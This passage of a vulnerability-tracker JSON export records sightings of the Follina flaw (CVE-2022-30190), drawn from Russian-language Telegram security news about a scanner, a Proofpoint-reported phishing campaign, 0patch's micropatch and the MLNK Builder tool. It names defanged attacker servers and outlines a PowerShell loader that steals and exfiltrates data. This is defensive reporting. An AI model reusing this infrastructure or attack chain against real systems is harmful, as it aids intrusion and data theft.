\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0432\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0430\u043d\u0430\u043b\u0438\u0437 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u0447\u0438\u043d \u0438 
\u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043e\u043a, \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f.", "creation_timestamp": "2022-07-04T20:00:05.000000Z"}, {"uuid": "644bb2d6-9cd4-4455-9e18-12fdb641c76e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/512", "content": "CVE-2022-30190 : Follina Scanner \nhttps://github.com/ErrorNoInternet/FollinaScanner", "creation_timestamp": "2022-10-03T10:30:15.000000Z"}, {"uuid": "28307472-e814-44cf-98db-8616d356d46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3032", "content": "\u034fFollinaGate \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0431\u043e\u0440\u043e\u0442\u044b. 
\u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u0448\u0438\u0431\u043a\u043e\u0439 Microsoft \u0443\u0436\u0435 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422 \u0434\u043b\u044f \u043d\u0430\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0421\u0428\u0410.\n\n\u041a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e 0-day Follina, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 ms-msdt \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441 \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0437\u0430\u043c\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441\u0430 Microsoft \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u0441\u0443\u0435\u0442\u0438\u0442\u044c\u0441\u044f, \u043f\u0440\u0430\u0432\u0434\u0430 \u043f\u043e\u043a\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0431\u0443\u043c\u0430\u0433\u0435, \u043a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f. 
\n\n\u042d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0447\u0430\u0441\u0442\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c: 0patch \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430\u00a0\u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u00a0\u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0431\u0430\u0433\u0438 Microsoft Windows Support Diagnostic Tool (MSDT).\n\n\u041e \u043d\u043e\u0432\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE CVE-2022-30190\u00a0(c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u043f\u043e CVSS: 7,8) \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Proofpoint, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0445\u043e\u0434\u0435 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e 
RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0441 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u043b\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441 45.76.53[.]253.\n\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0444\u043e\u0440\u043c\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Base64 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 seller-notification[.]live.\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, 
\u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043c\u0430\u0448\u0438\u043d\u044b, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0430, Proofpoint \u043f\u0440\u0438\u0448\u043b\u0438 \u043a \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u043e \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u043a \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0410\u0420\u0422.\n\n\u041d\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044f \u0438\u043c\u0435\u043d, \u043d\u043e \u0436\u0438\u0440\u043d\u043e \u043d\u0430\u043c\u0435\u043a\u0430\u044f \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u0435\u0439, \u0441\u0442\u0430\u0442\u044c\u0438 \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 
\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0447\u0430\u0442\u0430\u044e\u0442 \u0437\u0430\u043f\u0430\u0434\u043d\u044b\u0435 \u0438\u0437\u0434\u0430\u043d\u0438\u044f. \u0425\u043e\u0442\u044f \u043d\u0430\u043c \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043f\u0440\u0438 \u0442\u0430\u043a\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438.", "creation_timestamp": "2022-06-06T20:57:39.000000Z"}, {"uuid": "315722e1-ab02-4876-b2cf-888125a4c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3009", "content": "\u041f\u043e \u0441\u0442\u0430\u0440\u043e\u0439 \u0434\u043e\u0431\u0440\u043e\u0439 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Microsoft \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435, \u043a\u0440\u043e\u043c\u0435 \u0441\u0430\u043c\u043e\u0439 Microsoft.\n\n0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 Microsoft Windows Support Diagnostic Tool (MSDT), \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Follina, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0435 \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 0patch. 
\n\u00a0\n\u041f\u0430\u0442\u0447 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows: Windows 11 v21H2, Windows 10 (\u043e\u0442 v1803 \u0434\u043e v21H2), Windows 7 \u0438 Windows Server 2008 R2\n\n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0443\u0436\u0435 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0433\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f.\n\n\u0421\u0430\u043c \u0420\u0435\u0434\u043c\u043e\u043d\u0434 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0438\u0447\u0435\u0433\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043c\u0435\u0440\u0430\u043c\u0438 \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u0442\u0430\u043a, \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u00a0\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT.\n\n\u041e\u0434\u043d\u0430\u043a\u043e 0patch \u043f\u043e\u0448\u043b\u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0443\u0442\u0438, 
\u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u0430 MSDT, \u043e\u043d\u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438\u00a0\u043e\u0447\u0438\u0441\u0442\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0443\u0442\u0438 (\u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 Windows) \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u043c\u0430\u0441\u0442\u0435\u0440\u0430 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Windows \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0432 \u041e\u0421 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.\n\n0patch \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u043a\u0430\u043a\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f Office \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u043b\u0438 \u043e\u043d\u0430 \u0432\u043e\u043e\u0431\u0449\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 
\u043f\u043e\u043c\u043e\u0449\u044c\u044e\u00a0\u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u0432 \u0430\u0442\u0430\u043a.\n\n\u0427\u0442\u043e\u0431\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0438\u043a\u0440\u043e\u043f\u0430\u0442\u0447 \u0432 Windows \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 0patch-\u0430\u0433\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442 \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041e\u0436\u0438\u0434\u0430\u044e\u0449\u0438\u043c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 Microsoft \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0438 (\u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0432\u044b\u0439\u0434\u0435\u0442), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0430\u0442\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0438 \u0434\u043e\u0436\u0434\u0430\u0442\u044c\u0441\u044f \u043d\u043e\u0432\u044b\u0445 \u0434\u0432\u0443\u0445: \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445 \u0437\u0430\u043a\u0440\u043e\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0430 \u0432\u0442\u043e\u0440\u043e\u0439 - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f 
\u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439.", "creation_timestamp": "2022-06-02T11:31:14.000000Z"}, {"uuid": "43f097e5-0b75-4ec7-b3a5-2c009ed6c2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3195", "content": "\u034f\u041e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0443\u0441\u043b\u0443\u0433\u0438 \u0418\u0411 \u0434\u043b\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 Fortune 500, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Resecurity Inc.\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 MLNK Builder - \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (LNK) \u0441 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u043d\u044b\u043c Powershell \u0438 VBS Obfuscator.\n\nMLNK Builder \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432\u00a0Dark Web\u00a0\u0432 \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 4.2 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u0435 \u043e\u0442 
\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0438 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044f\u0440\u043b\u044b\u043a\u043e\u0432 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f ransomware \u0438\u043b\u0438 \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0438\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0412\u0441\u043f\u043b\u0435\u0441\u043a \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c LNK, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043a\u0430\u043a APT \u0438 \u0441\u043a\u0438\u043b\u043b\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c\u0438, \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0432 
\u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e \u043c\u0430\u0439 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 - \u043a\u0430\u043a \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Bumblebee\u00a0Loader \u0438\u00a0UAC-0010 (Armageddon).\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 Bumblebee \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u044b\u0435 \u0444\u043e\u0440\u043c\u044b \u043d\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u0435 \u0446\u0435\u043b\u0438.\u00a0\u0412 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u0445 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0430\u0439\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0441\u0441\u044b\u043b\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 